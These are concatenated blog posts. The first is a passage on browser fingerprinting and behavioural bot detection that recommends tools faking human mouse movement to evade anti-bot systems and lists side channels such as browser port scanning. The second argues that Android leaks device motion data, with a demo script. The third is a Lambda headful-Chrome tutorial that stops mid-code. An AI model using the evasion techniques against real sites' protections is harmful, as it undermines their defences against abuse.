<p>Note that those two optimization goals contradict each other! You can't maximize both at the same time. It's a typical optimization problem.</p>
<p>For example, a good browser fingerprint should not change when the browser is updated. Therefore, the User-Agent is not a good entropy source for a fingerprint. Furthermore, a good fingerprint should not change when the user switches into incognito mode. Therefore, cookies and other data set by the server are no good either!</p>
<p>The much liked open source project <a href="https://github.com/fingerprintjs/fingerprintjs">fingerprintjs2</a> uses the following entropy sources to build its fingerprint:</p>
<div class="highlight"><pre><span></span><code><span class="k">export</span> <span class="kd">const</span> <span class="nx">sources</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">osCpu</span>: <span class="kt">getOsCpu</span><span class="p">,</span> <span class="c1">// navigator.oscpu</span>
<span class="nx">languages</span>: <span class="kt">getLanguages</span><span class="p">,</span> <span class="c1">// navigator.language and navigator.languages</span>
<span class="nx">colorDepth</span>: <span class="kt">getColorDepth</span><span class="p">,</span> <span class="c1">// window.screen.colorDepth</span>
<span class="nx">deviceMemory</span>: <span class="kt">getDeviceMemory</span><span class="p">,</span> <span class="c1">// navigator.deviceMemory</span>
<span class="nx">screenResolution</span>: <span class="kt">getScreenResolution</span><span class="p">,</span> <span class="c1">// screen.width and screen.height</span>
<span class="nx">availableScreenResolution</span>: <span class="kt">getAvailableScreenResolution</span><span class="p">,</span> <span class="c1">// screen.availWidth and screen.availHeight</span>
<span class="nx">hardwareConcurrency</span>: <span class="kt">getHardwareConcurrency</span><span class="p">,</span> <span class="c1">// navigator.hardwareConcurrency</span>
<span class="nx">timezoneOffset</span>: <span class="kt">getTimezoneOffset</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">timezone</span>: <span class="kt">getTimezone</span><span class="p">,</span> <span class="c1">// (new window.Intl.DateTimeFormat).resolvedOptions().timeZone</span>
<span class="nx">sessionStorage</span>: <span class="kt">getSessionStorage</span><span class="p">,</span> <span class="c1">// !!window.sessionStorage</span>
<span class="nx">localStorage</span>: <span class="kt">getLocalStorage</span><span class="p">,</span> <span class="c1">// !!window.localStorage</span>
<span class="nx">indexedDB</span>: <span class="kt">getIndexedDB</span><span class="p">,</span> <span class="c1">// !!window.indexedDB</span>
<span class="nx">openDatabase</span>: <span class="kt">getOpenDatabase</span><span class="p">,</span> <span class="c1">// !!window.openDatabase</span>
<span class="nx">cpuClass</span>: <span class="kt">getCpuClass</span><span class="p">,</span> <span class="c1">// navigator.cpuClass</span>
<span class="nx">platform</span>: <span class="kt">getPlatform</span><span class="p">,</span> <span class="c1">// navigator.platform</span>
<span class="nx">plugins</span>: <span class="kt">getPlugins</span><span class="p">,</span> <span class="c1">// navigator.plugins</span>
<span class="nx">canvas</span>: <span class="kt">getCanvasFingerprint</span><span class="p">,</span> <span class="c1">// </span>
<span class="nx">touchSupport</span>: <span class="kt">getTouchSupport</span><span class="p">,</span><span class="c1">// navigator.maxTouchPoints</span>
<span class="nx">fonts</span>: <span class="kt">getFonts</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">audio</span>: <span class="kt">getAudioFingerprint</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">pluginsSupport</span>: <span class="kt">getPluginsSupport</span><span class="p">,</span> <span class="c1">// !!navigator.plugins</span>
<span class="nx">productSub</span>: <span class="kt">getProductSub</span><span class="p">,</span> <span class="c1">// navigator.productSub</span>
<span class="nx">emptyEvalLength</span>: <span class="kt">getEmptyEvalLength</span><span class="p">,</span> <span class="c1">// eval.toString().length</span>
<span class="nx">errorFF</span>: <span class="kt">getErrorFF</span><span class="p">,</span> <span class="c1">//</span>
<span class="nx">vendor</span>: <span class="kt">getVendor</span><span class="p">,</span> <span class="c1">// navigator.vendor</span>
<span class="nx">chrome</span>: <span class="kt">getChrome</span><span class="p">,</span> <span class="c1">// window.chrome !== undefined</span>
<span class="nx">cookiesEnabled</span>: <span class="kt">areCookiesEnabled</span><span class="p">,</span> <span class="c1">// check document.cookie writable</span>
<span class="p">}</span>
</code></pre></div>
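<p>As you can see, the individual entropy sources are more or less stable. Each one alone says little, but concatenated and hashed (fingerprintjs uses a MurmurHash3 variant, not SHA-2), they carry enough entropy to make most fingerprints highly distinctive.</p>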
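<p>The principle of concatenating and hashing can be sketched in a few lines. Note that this is not the library's implementation: the function names are made up and a small FNV-1a-style hash serves as a stand-in to keep the example self-contained.</p>

```javascript
// FNV-1a-style 32-bit hash over the UTF-16 code units of a string.
// Only a stand-in for illustration, not the hash a real library uses.
function hashString(input) {
  let hash = 0x811c9dc5;
  for (let i = 0; i < input.length; i++) {
    hash ^= input.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193);
  }
  return (hash >>> 0).toString(16).padStart(8, '0');
}

// Serialize the components in a stable key order, then hash the result.
function buildFingerprint(components) {
  const serialized = Object.keys(components)
    .sort()
    .map((key) => key + '=' + JSON.stringify(components[key]))
    .join('|');
  return hashString(serialized);
}

// In a browser, the components would come from the entropy sources, e.g.:
// buildFingerprint({
//   platform: navigator.platform,
//   colorDepth: window.screen.colorDepth,
//   hardwareConcurrency: navigator.hardwareConcurrency,
// });
```

<p>Sorting the keys makes the result independent of the order in which the sources were collected, so the same device always yields the same hash as long as none of the values changes.</p>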
<h3 id="behavior">6. Be Aware of Behavioral UI Analysis</h3>
<p>Some anti bot companies such as <a href="https://www.perimeterx.com/">PerimeterX</a> and <a href="https://www.shapesecurity.com/">Shape Security</a> record mouse movements and other user generated UI data such as scroll events or key presses.</p>
<p>The idea is to record the following JavaScript events from any visiting browser:</p>
<ul>
<li>Events indicating page load - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/load_event">load</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/DOMContentLoaded_event">DOMContentLoaded</a></li>
<li>User switches the tab - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/visibilitychange_event">visibilitychange</a></li>
<li>Mouse events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousedown_event">mousedown / mouseup</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/mousemove_event">mousemove</a></li>
<li>Scroll events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/scroll">scroll</a></li>
<li>Mobile Touch Events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Touch_events">touchstart / touchend</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/touchmove_event">touchmove</a></li>
<li>Keyboard events - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/keydown_event">keydown / keyup</a></li>
<li>Events indicating the unloading of the page - <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/pagehide_event">pagehide</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event">unload</a> / <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event">beforeunload</a></li>
</ul>
<p>A relative timestamp obtained with <code>performance.now()</code> is then attached to each such event. The data is transmitted with <code>navigator.sendBeacon()</code>, an image pixel or in real time with WebSockets.</p>
<p>This will result in a time series of user generated events for the time spent on the recorded website.</p>
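<p>A minimal recorder for such a time series might look like this. It is a sketch under assumptions: the function name, the reduced event list and the <code>/collect</code> endpoint are hypothetical, and real products record far more detail.</p>

```javascript
// Attach listeners to `target` (for example window) and record each
// event together with a relative timestamp taken from `now()`.
function createEventRecorder(target, now) {
  const trace = [];
  const names = ['DOMContentLoaded', 'load', 'mousemove', 'scroll',
    'keydown', 'keyup', 'visibilitychange', 'pagehide'];
  for (const name of names) {
    target.addEventListener(name, (event) => {
      const entry = [name];
      if (name === 'mousemove') entry.push(event.clientX, event.clientY);
      entry.push(Math.round(now() * 100) / 100); // two decimal places
      trace.push(entry);
    }, { passive: true });
  }
  return trace;
}

// In a browser ("/collect" is a made-up endpoint):
// const trace = createEventRecorder(window, () => performance.now());
// window.addEventListener('pagehide', () => {
//   navigator.sendBeacon('/collect', JSON.stringify(trace));
// });
```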
<p>With this data (or the lack of the data), you can derive several conclusions about the behavior of the visiting user.</p>
<p>For example, all of the scraping companies examined above</p>
<ol>
<li><a href="https://scrapingbee.com">ScrapingBee</a></li>
<li><a href="https://scrapingrobot.com">scrapingrobot.com</a></li>
<li><a href="https://www.scraperapi.com/">scraperapi.com</a></li>
</ol>
<p>do not produce such UI events for their headless scrapers. All they produce is the following event trace (scrapingbee.com was used as an example):</p>
<div class="highlight"><pre><span></span><code>[
["DOMContentLoaded", 2716.16],
["load", 3363.74],
["pagehide",false, 4728.83],
["visibilitychange","hidden", 4729.195],
["unload", 4729.485],
]
</code></pre></div>
<p>As you can see, their scraper spends only about 1.4 seconds on the website (the time difference between the <code>load</code> and <code>pagehide</code> events).</p>
<p>Compare this to an event trace of a real human visitor:</p>
<div class="highlight"><pre><span></span><code>[
["DOMContentLoaded",373.36],
["load",428.55],
["mousemove",948,30,749.33],
["mousemove",969,119,765.54],
["mousemove",1000,176,781.81],
["mousemove",1053,218,798.47],
["mousemove",1133,227,815.335],
["mousemove",1222,218,831.815],
["mousemove",1300,185,848.86],
...
["beforeunload",1632.67],
["pagehide",false,1635.35],
["visibilitychange","hidden",1635.57],
["unload",1635.85],
["visibilitychange","hidden",1639.87],
]
</code></pre></div>
<p>This event trace was produced by moving the mouse quickly and then leaving the page.</p>
<p>So the real question is: Isn't it quite common that some people just open a page, but never choose to interact with the page? </p>
<p>This is not an easy question to answer, but in reality, most humans that open a website and quickly navigate away at least emit a few <code>mousemove</code> and <code>scroll</code> events. Even if they navigate the page with the keyboard, they usually emit some keyboard combination that switches the tab or closes the page.</p>
<p>It is quite rare that real human beings just open a page and never interact with it. On desktop systems, this could for example happen if you are browsing a page and click on a link with the middle mouse button: This opens a page without switching the tab to it.</p>
<p>Nevertheless, a pattern such as the above is quite rare for real human user agents. If the above event trace appears a lot on a website, it is relatively safe to assume that the user agent is a robot.</p>
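<p>A very rough heuristic over such event traces could be sketched as follows. The function names and the rule "no interaction events at all" are my own simplifications, not what any commercial product actually does.</p>

```javascript
const INTERACTION_EVENTS = new Set(['mousemove', 'mousedown', 'mouseup',
  'scroll', 'touchstart', 'touchmove', 'touchend', 'keydown', 'keyup']);

// Each trace entry is [eventName, ...details, timestampInMs].
function summarizeTrace(trace) {
  const timeOf = (name) => {
    const entry = trace.find((e) => e[0] === name);
    return entry ? entry[entry.length - 1] : null;
  };
  const load = timeOf('load');
  const pagehide = timeOf('pagehide');
  return {
    interactions: trace.filter((e) => INTERACTION_EVENTS.has(e[0])).length,
    dwellMs: load !== null && pagehide !== null ? pagehide - load : null,
  };
}

// Assumed rule: a visit without a single interaction event looks automated.
function looksAutomated(trace) {
  return summarizeTrace(trace).interactions === 0;
}
```

<p>A single such visit proves nothing. The signal only becomes meaningful when the same pattern shows up across many visits.</p>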
<p>How can you equip your scraper with synthetic behavioral data that looks as if a human generated it?</p>
<p>There is a module called <a href="https://github.com/Xetera/ghost-cursor">ghost-cursor</a> which simulates human mouse movements with the help of <a href="https://en.wikipedia.org/wiki/B%C3%A9zier_curve">Bezier</a> curves and <a href="https://en.wikipedia.org/wiki/Fitts%27s_law">Fitts's law</a>. According to Wikipedia, Fitts's law suggests:</p>
<p>A movement during a single Fitts's law task can be split into two phases:</p>
<ol>
<li><strong>Initial movement</strong>. A fast but imprecise movement towards the target. The first phase is defined by the distance to the target. In this phase the distance can be closed quickly while still being imprecise.</li>
<li><strong>Final movement</strong>. Slower but more precise movement in order to acquire the target. The second movement tries to perform a slow and controlled precise movement to actually hit the target.</li>
</ol>
<p>It's best to use <a href="https://github.com/Xetera/ghost-cursor">ghost-cursor</a> in combination with <a href="https://github.com/berstend/puppeteer-extra/tree/automation-extra/packages/plugin-humanize">plugin-humanize</a> according to the authors.</p>
<p>There is, however, one <strong>big problem with ghost-cursor</strong>: Mouse movement always starts in the perfect origin (0, 0). Real humans start their mouse movement somewhere random on the page or somewhere on the top/left side of the window.</p>
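<p>To illustrate the idea, here is a small sketch that generates a curved mouse path along a cubic Bezier curve from a random starting point. This is not the ghost-cursor API. All function names and the jitter magnitude are assumptions, and the timing aspect of Fitts's law is left out entirely.</p>

```javascript
// Evaluate a cubic Bezier curve at parameter t in [0, 1].
function cubicBezier(p0, p1, p2, p3, t) {
  const u = 1 - t;
  const a = u * u * u, b = 3 * u * u * t, c = 3 * u * t * t, d = t * t * t;
  return {
    x: a * p0.x + b * p1.x + c * p2.x + d * p3.x,
    y: a * p0.y + b * p1.y + c * p2.y + d * p3.y,
  };
}

// Pick a random starting point inside the viewport instead of (0, 0).
function randomStart(width, height, random = Math.random) {
  return { x: Math.floor(random() * width), y: Math.floor(random() * height) };
}

// Build a path of steps + 1 points from start to end with two
// randomly displaced control points (200px jitter is an assumed value).
function mousePath(start, end, steps = 20, random = Math.random) {
  const jitter = () => (random() - 0.5) * 200;
  const p1 = { x: start.x + (end.x - start.x) / 3 + jitter(),
               y: start.y + (end.y - start.y) / 3 + jitter() };
  const p2 = { x: start.x + 2 * (end.x - start.x) / 3 + jitter(),
               y: start.y + 2 * (end.y - start.y) / 3 + jitter() };
  const path = [];
  for (let i = 0; i <= steps; i++) {
    path.push(cubicBezier(start, p1, p2, end, i / steps));
  }
  return path;
}

// Usage: mousePath(randomStart(1920, 1080), { x: 640, y: 360 })
```

<p>The resulting points could then be fed one by one into the mouse API of your automation library, with small random delays in between.</p>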
<p>Another alternative is to use the fairly new scraping browser project <a href="https://github.com/ulixee/secret-agent">secret-agent</a>. The <a href="https://secretagent.dev/docs/advanced/human-emulators">documentation of the HumanEmulators</a> promises:</p>
<blockquote>
<p>HumanEmulators are plugins that sit between your script and SecretAgent's mouse/keyboard movements. They translate your clicks and moves into randomized human-like patterns that can pass the bot-blocker checks.</p>
</blockquote>
<p>I haven't tested <a href="https://github.com/ulixee/secret-agent">secret-agent</a> extensively, but it appears to be a very ambitious project. Could be too ambitious after all. Sometimes, simplicity is key.</p>
<h3 id="sideChannel">7. Side Channel Attacks can Reveal that you are a Bot</h3>
<p>Side channel attacks on browsers form an endlessly large group. When you are using a real browser for your scraping projects, you are exposing an extremely vast side channel attack surface to the website you are visiting.</p>
<p>To give you some quick overview, those are some examples that leak information about the environment where your browser (and thus scraper) is running:</p>
<ol>
<li><a href="https://crypto.stanford.edu/~dabo/pubs/abstracts/browserRedPills.html">Browser Red Pills</a> - Timing JavaScript code with <code>performance.now()</code> in order to make educated guesses whether the browser is running in a virtual machine.</li>
<li>Proof of Work Captchas such as <a href="https://friendlycaptcha.com/">friendlycaptcha</a> </li>
<li><a href="https://www.dnsleaktest.com/what-is-a-dns-leak.html">DNS Leaks</a> - They occur when the DNS Name is not resolved by the anonymous tunnel that you are using for hiding your browser traffic</li>
<li><a href="https://browserleaks.com/webrtc">WebRTC Leaks</a> </li>
<li><a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">Browser Based Port Scanning</a> - Port scanning the internal network where your scraper is running might reveal a lot about your network. Or for example that you are running a browser on a VPS with open ports 9222 or 22.</li>
</ol>
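<p>To give an impression of the timing primitive behind the first item, here is a minimal sketch. It only measures how long a fixed workload takes. The function names and the workload are my own assumptions, and the sketch deliberately does not say which timings would indicate a virtual machine.</p>

```javascript
// Time a fixed CPU-bound workload with performance.now().
function timeWorkload(iterations = 1e6) {
  const start = performance.now();
  let acc = 0;
  for (let i = 0; i < iterations; i++) acc += Math.sqrt(i);
  const elapsed = performance.now() - start;
  return { elapsed, acc }; // acc is returned so the loop has an observable result
}

// Repeat the measurement and take the median to dampen outliers.
function medianTiming(runs = 9, iterations = 1e6) {
  const samples = [];
  for (let i = 0; i < runs; i++) samples.push(timeWorkload(iterations).elapsed);
  samples.sort((a, b) => a - b);
  return samples[Math.floor(samples.length / 2)];
}

// Usage: console.log(medianTiming() + ' ms');
```

<p>A detection script would compare such measurements against values collected from known environments. How reliable that is in practice depends heavily on the timer resolution the browser grants.</p>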
<h2>Conclusion</h2>
<p>To be done.</p>Why does this Website know that I am sitting on the Toilet?2021-02-05T22:17:00+01:002021-02-18T22:17:00+01:00Nikolai Tschachertag:incolumitas.com,2021-02-05:/2021/02/05/why-does-this-website-know-i-am-sitting-on-the-toilet/<p>Android mobile devices give to any website device orientation and device motion data. This data is quite sensitive in nature and should not be granted to websites without obtaining explicit user consent.</p><p>Android smartphones grant websites access to the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/deviceorientation_event">deviceorientation</a> and the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/devicemotion_event">devicemotion</a> events.</p>
<p>These events provide real-time motion data and rotation angles of the smartphone. The data comes from the built-in accelerometer, <a href="https://en.wikipedia.org/wiki/Gyroscope">gyroscope</a> and compass of the mobile device.</p>
<p>So if you are visiting this website from your Android mobile phone, you can see your device motion data in the box below.</p>
<div id="example" style="border: 3px solid #aaa; padding: 12px">
<strong><code>deviceorientation</code> events</strong>
<pre id="deviceorientationOutput">{}</pre>
<hr />
<strong><code>devicemotion</code> events</strong>
<pre id="devicemotionOutput">{}</pre>
<script>
(function() {
var isAndroid = /(android)/i.test(navigator.userAgent);
if (!isAndroid) {
document.getElementById('example').innerHTML = '<strong>You\'re not visiting from an Android device</strong>';
return;
}
function round2(num) {
return +(Math.round(num + "e+2") + "e-2");
}
window.addEventListener('devicemotion', function(event) {
// event.acceleration may be null if the device cannot provide it
var acceleration = event.acceleration || { x: null, y: null, z: null };
var x = acceleration.x;
var y = acceleration.y;
var z = acceleration.z;
// An object giving the rate of change of the device's orientation
// on the three orientation axes alpha, beta and gamma.
// Rotation rate is expressed in degrees per second.
var rotationRate = event.rotationRate;
// A number representing the interval of time, in milliseconds, at which data is obtained from the device.
var interval = event.interval;
if (x !== null && y !== null && z !== null) {
// only update the output if the acceleration exceeds
// 0.5 m/s² on at least one of the axes
if (Math.abs(x) > 0.5 || Math.abs(y) > 0.5 || Math.abs(z) > 0.5) {
var el = document.getElementById('devicemotionOutput');
el.innerHTML = JSON.stringify({
event: 'devicemotion',
accelerationX: round2(x),
accelerationY: round2(y),
accelerationZ: round2(z),
interval: interval,
}, null, 2);
}
}
})
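// Last reported orientation, kept in the closure instead of on the global object
var last = { alpha: null, beta: null, gamma: null };
window.addEventListener('deviceorientation', function(event) {
// only consider significant changes in rotation: skip the event
// when none of the angles changed by at least one degree
if (last.alpha !== null
&& Math.abs(last.alpha - event.alpha) < 1
&& Math.abs(last.gamma - event.gamma) < 1
&& Math.abs(last.beta - event.beta) < 1) {
return;
}
last.alpha = event.alpha;
last.beta = event.beta;
last.gamma = event.gamma;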
if (event.alpha !== null && event.beta !== null && event.gamma !== null) {
var el = document.getElementById('deviceorientationOutput');
el.innerHTML = JSON.stringify({
event: 'deviceorientation',
alpha: round2(event.alpha),
beta: round2(event.beta),
gamma: round2(event.gamma),
absolute: event.absolute,
}, null, 2);
}
})
})();
</script>
</div>
<h3>Sensitive Nature of Motion and Orientation Data</h3>
<p>Smartphone motion and orientation data can reveal a lot about your real-life behavior while you browse a website. Some of the following information can be inferred from the motion and orientation data of your device:</p>
<ul>
<li>In what position you are interacting with the website: Sitting, lying, standing, running, ...</li>
<li>Whether you are moving around while looking at the website</li>
<li>Whether your smartphone is falling down (which would be an excellent moment to back up data)</li>
</ul>
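<p>The last item can be sketched in a few lines. An accelerometer at rest measures roughly 9.81 m/s² (gravity), while a device in free fall measures close to zero. The threshold of 2.0 m/s² and the function names below are assumptions for illustration; a robust detector would also require the condition to hold for several consecutive events.</p>

```javascript
// Assumed threshold in m/s^2: at rest the magnitude is about 9.81 (gravity),
// in free fall it drops towards 0.
const FREE_FALL_THRESHOLD = 2.0;

// Euclidean length of an acceleration vector {x, y, z}.
function accelerationMagnitude(a) {
  return Math.sqrt(a.x * a.x + a.y * a.y + a.z * a.z);
}

// Returns true when the reading looks like free fall.
// Missing sensor data is treated as "not falling".
function isFreeFall(accelerationIncludingGravity) {
  const a = accelerationIncludingGravity;
  if (!a || a.x === null || a.y === null || a.z === null) {
    return false;
  }
  return accelerationMagnitude(a) < FREE_FALL_THRESHOLD;
}

// Browser wiring; skipped when the snippet runs outside a browser.
if (typeof window !== 'undefined') {
  window.addEventListener('devicemotion', function (event) {
    if (isFreeFall(event.accelerationIncludingGravity)) {
      console.log('device appears to be falling');
    }
  });
}
```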
<p>For example, if you follow a video conference on your Android smartphone or tablet while lying in bed, it would be possible to infer this from the device orientation and motion data, even though you preemptively disabled your camera and microphone. Isn't that a bit creepy? Why is a website allowed to infer what I am currently doing in real life?</p>
<p>Furthermore, I am quite sure that it would also be possible to infer that you are visiting the toilet from a time series of motion and device orientation data. The reason is the following: a visit to the toilet produces a characteristic sequence. First you walk to a room, then you sit down, and then you hold your phone at a certain angle. It is very likely that some distinctive pattern in the motion and orientation data correlates with visits to the toilet.</p>
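<p>As a rough illustration of how little code such an inference needs, the sketch below maps a single orientation sample to a coarse guess about how the phone is held. The function name <code>guessHolding</code>, the labels and all angle thresholds are assumptions picked by hand; they were not measured and would need tuning against real recordings.</p>

```javascript
// Hypothetical classifier: maps the beta (front-to-back tilt) and gamma
// (left-to-right tilt) angles of one sample to a coarse label.
function guessHolding(beta, gamma) {
  if (beta === null || gamma === null) {
    return 'unknown';
  }
  const absBeta = Math.abs(beta);
  if (absBeta > 110) {
    // The screen points towards the ground, e.g. the phone is held
    // above the face while lying on the back.
    return 'screen-facing-down';
  }
  if (absBeta < 20 && Math.abs(gamma) < 20) {
    // Nearly level, e.g. lying on a table.
    return 'flat';
  }
  if (beta >= 45 && beta <= 110) {
    // Held in front of the body, e.g. while sitting or standing.
    return 'upright';
  }
  return 'tilted';
}

console.log(guessHolding(80, 5));
```

<p>A real attack would look at sequences of such labels together with the motion data, not at isolated samples.</p>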
<p>Apple has a clear stance regarding the <code>deviceorientation</code> and <code>devicemotion</code> events on the iOS platform: Those events are <a href="https://www.macrumors.com/2019/02/04/ios-12-2-safari-motion-orientation-access-toggle/">disabled by default</a> and a website needs to <a href="https://dev.to/li/how-to-requestpermission-for-devicemotion-and-deviceorientation-events-in-ios-13-46g2">ask for permission in order to use them</a>. Why is this not the case on the Android operating system?</p>
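<p>For comparison, this is roughly what the permission flow looks like on iOS 13 and later, where Safari exposes a static <code>requestPermission()</code> method on <code>DeviceMotionEvent</code> and <code>DeviceOrientationEvent</code>. The wrapper name <code>requestMotionAccess</code> and the return values <code>'unsupported'</code> and <code>'not-required'</code> are my own additions for this sketch. The event constructor is passed in as an argument so that the function can also be exercised outside a browser.</p>

```javascript
// Hypothetical wrapper around the iOS permission prompt.
// Resolves to 'granted' or 'denied' where the browser asks for permission,
// 'not-required' where no prompt exists, 'unsupported' where the event
// constructor itself is missing.
async function requestMotionAccess(EventCtor) {
  if (typeof EventCtor === 'undefined' || EventCtor === null) {
    return 'unsupported';
  }
  if (typeof EventCtor.requestPermission !== 'function') {
    return 'not-required';
  }
  try {
    return await EventCtor.requestPermission();
  } catch (err) {
    // Safari rejects the promise when the call does not come from a user gesture.
    return 'denied';
  }
}

// Browser wiring: the request has to be triggered by a user gesture such as a click.
if (typeof document !== 'undefined') {
  document.addEventListener('click', function () {
    requestMotionAccess(window.DeviceMotionEvent).then(function (state) {
      console.log('motion access:', state);
    });
  }, { once: true });
}
```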
<h3>The <code>deviceorientation</code> Event</h3>
<p><code>let evt = DeviceOrientationEvent</code></p>
<p>This event yields a <a href="https://developer.mozilla.org/en-US/docs/Web/API/DeviceOrientationEvent">DeviceOrientationEvent</a> object every 10ms. This event includes the following information:</p>
<ul>
<li><code>evt.absolute</code> - A boolean that indicates whether or not the device is providing orientation data absolutely.</li>
<li>
<p><code>evt.alpha</code> - A number representing the motion of the device around the z axis, expressed in degrees with values ranging from 0 (inclusive) to 360 (exclusive).</p>
</li>
<li>
<p><code>evt.beta</code> - A number representing the motion of the device around the x axis, expressed in degrees with values ranging from -180 (inclusive) to 180 (exclusive). This represents a front to back motion of the device.</p>
</li>
<li><code>evt.gamma</code> - A number representing the motion of the device around the y axis, expressed in degrees with values ranging from -90 (inclusive) to 90 (exclusive). This represents a left to right motion of the device.</li>
</ul>
<figure>
<img src="/images/deviceorientation.png" alt="deviceorientation" style="width:700px" />
<figcaption>You can simulate device orientation data with Chrome Dev Tools</figcaption>
</figure>
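<p>The actual event rate depends on the browser and the device, so it is worth measuring it yourself. The following sketch collects the <code>timeStamp</code> of 100 <code>deviceorientation</code> events and prints the mean interval between them. The helper name <code>meanInterval</code> and the sample size are arbitrary choices for this example.</p>

```javascript
// Mean distance between consecutive timestamps in milliseconds,
// or null when fewer than two samples are available.
function meanInterval(timestamps) {
  if (timestamps.length < 2) {
    return null;
  }
  const span = timestamps[timestamps.length - 1] - timestamps[0];
  return span / (timestamps.length - 1);
}

// Browser wiring; skipped when the snippet runs outside a browser.
if (typeof window !== 'undefined') {
  const stamps = [];
  window.addEventListener('deviceorientation', function handler(event) {
    stamps.push(event.timeStamp);
    if (stamps.length === 100) {
      window.removeEventListener('deviceorientation', handler);
      console.log('mean interval (ms):', meanInterval(stamps));
    }
  });
}
```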
<h3>The <code>devicemotion</code> Event</h3>
<p><code>let evt = DeviceMotionEvent</code></p>
<p>This event yields a <a href="https://developer.mozilla.org/en-US/docs/Web/API/DeviceMotionEvent"><code>DeviceMotionEvent</code></a> object every 10ms. This event includes the following information:</p>
<ul>
<li><code>evt.acceleration</code> - An object giving the acceleration of the device on the three axes X, Y and Z. Acceleration is expressed in m/s².</li>
<li><code>evt.accelerationIncludingGravity</code> - An object giving the acceleration of the device on the three axes X, Y and Z with the effect of gravity. Acceleration is expressed in m/s².</li>
<li><code>evt.rotationRate</code> - An object giving the rate of change of the device's orientation on the three orientation axes alpha, beta and gamma. Rotation rate is expressed in degrees per second.</li>
<li><code>evt.interval</code> - A number representing the interval of time, in milliseconds, at which data is obtained from the device.</li>
</ul>Headful Google Chrome with Xvfb on AWS Lambda Container2021-01-23T14:40:00+01:002021-01-23T14:40:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-23:/2021/01/23/run-xvfb-on-aws-lambda-container/<p>The following write-up is an attempt to launch headful Google Chrome with Xvfb on AWS Lambda container.</p><h3>Introduction</h3>
<p>This quick tutorial attempts to run <strong>headful</strong> Google Chrome on AWS Lambda with the <code>Xvfb</code> virtual framebuffer display server.</p>
<p>Sometimes headless browsers are not enough. Sometimes you need a browser that is indistinguishable from a real browser and
it needs to run with a virtual frame buffer. The goal of this article is to run the Google Chrome browser in AWS Lambda with <code>Xvfb</code> using a Docker container.</p>
<p>Since December 2020, it has been possible to run <a href="https://aws.amazon.com/blogs/aws/new-for-aws-lambda-container-image-support/">Docker images in AWS Lambda</a>. You now have full control over the operating system stack, as long
as your container either derives from an AWS Lambda base image or implements the Lambda runtime API.</p>
<h3>What works</h3>
<p>Running the Chromium browser that the <a href="https://github.com/alixaxel/chrome-aws-lambda">chrome-aws-lambda</a> project compiles specifically for AWS Lambda seems to work fine in a Lambda Docker container.</p>
<p>This is the Dockerfile:</p>
<div class="highlight"><pre><span></span><code><span class="k">FROM</span><span class="w"> </span><span class="s">public.ecr.aws/lambda/nodejs:12</span>
<span class="k">RUN</span><span class="w"> </span>mkdir /app
<span class="k">WORKDIR</span><span class="w"> </span><span class="s">/app</span>
<span class="k">COPY</span><span class="w"> </span>package*.json /app/
<span class="k">RUN</span><span class="w"> </span>npm install
<span class="k">COPY</span><span class="w"> </span>run.js /app/
<span class="k">CMD</span><span class="w"> </span><span class="p">[</span><span class="s2">"/app/run.handler"</span><span class="p">]</span>
</code></pre></div>
<p>This is the package.json:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"lambda-container"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.0.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"description"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"main"</span><span class="p">:</span><span class="w"> </span><span class="s2">"run.js"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"scripts"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"test"</span><span class="p">:</span><span class="w"> </span><span class="s2">"echo \"Error: no test specified\" && exit 1"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
<span class="w"> </span><span class="nt">"author"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"license"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ISC"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dependencies"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"chrome-aws-lambda"</span><span class="p">:</span><span class="w"> </span><span class="s2">"^5.5.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"puppeteer-core"</span><span class="p">:</span><span class="w"> </span><span class="s2">"^5.5.0"</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>This is <code>run.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">chromium</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-aws-lambda'</span><span class="p">);</span>
<span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">context</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
